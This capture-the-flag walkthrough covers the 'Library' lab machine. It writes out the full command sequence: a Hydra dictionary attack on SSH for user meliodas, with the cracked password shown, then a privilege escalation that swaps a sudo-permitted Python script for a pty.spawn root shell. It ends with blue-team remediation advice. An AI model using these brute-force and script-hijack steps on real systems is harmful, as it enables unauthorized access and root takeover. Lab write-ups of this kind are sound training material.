Target IP: library.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: User (meliodas) & Root (root.txt) Flags
1. Executive Summary
“Library” is a Linux machine hosting a simple blog. Initial access is obtained by identifying a valid username (meliodas) from the web application and performing a dictionary attack (Hydra) against the SSH service. Privilege escalation exploits a misconfigured sudo permission that allows the user to run a Python script as root. Due to file permission restrictions, we delete the original script and replace it with a malicious one to spawn a root shell.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap port scanning.
- T1078 (Valid Accounts): identifying
meliodasvia web enumeration. - T1110 (Brute Force): Hydra SSH cracking.
- T1548.003 (Sudo and Sudo Caching): Exploiting sudo rights on a writable script.
2. Operational Setup
Host Configuration
echo "10.10.x.x library.thm" | sudo tee -a /etc/hosts3. Enumeration
A. Network Scanning
Your scan shows a standard Linux server profile:
- 22/tcp (SSH): OpenSSH 7.2p2.
- 80/tcp (HTTP): Apache 2.4.18.
B. Web Enumeration
Accessing http://library.thm:
- Content: A blog about “The Seven Deadly Sins” (Anime reference).
- Robots.txt: You noted
/is disallowed (standard for some CTFs to verify robots checking). - Username Discovery: Reading the posts (specifically the author name) or comments often reveals the user
meliodas.
C. Credential Attacks (Hydra)
Since we have a username (meliodas) and open SSH, we attempt to crack the password.
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://library.thm- Result:
meliodas:iloveyou1(or similar from Rockyou).
4. Initial Access: SSH
We log in with the cracked credentials.
ssh meliodas@library.thmUser Flag: /home/meliodas/user.txt.
5. Privilege Escalation: The Python Script
Enumeration
We check for sudo privileges immediately.
sudo -lOutput:
User meliodas may run the following commands on library:
(root) /usr/bin/python3 /home/meliodas/bak.pyThe Vulnerability: Directory Permissions
We inspect the file permissions.
ls -la /home/meliodas/bak.py
# -r--r--r-- 1 root root ... bak.py- The Problem: The file is owned by
rootand is read-only for everyone. We cannot edit it directly (nano bak.py-> Permission denied). - The Flaw: The file is located in
/home/meliodas. As the owner of the directory,meliodashas the right to modify the directory contents (i.e., delete files and create new ones).
Exploitation (The Swap)
You correctly identified that since you can’t edit the file, you must replace it.
- Delete the Original:
rm /home/meliodas/bak.py- Create the Malicious Script: We create a new file with the same name. Since we are creating it, we own it and can write to it.
echo 'import pty; pty.spawn("/bin/bash")' > /home/meliodas/bak.py- Execute: We run the script using the specific sudo command allowed.
sudo /usr/bin/python3 /home/meliodas/bak.pyResult:
The python3 binary runs as root (via sudo), executes our code, and pty.spawn gives us an interactive shell.
# whoami
rootRoot Flag: /root/root.txt.
6. Remediation (Blue Team)
- SSH Hardening:
- Disable password authentication for SSH (
PasswordAuthentication no). Use SSH keys instead. - Implement Fail2Ban to block IPs performing brute-force attacks.
- Sudo Configuration:
- Never allow users to run scripts located in their own home directories (or any directory they have write access to) as
root. - If a script must be run as root, it should be owned by root, located in a protected directory (like
/opt/scriptsor/usr/local/bin), and have strict permissions (700or755).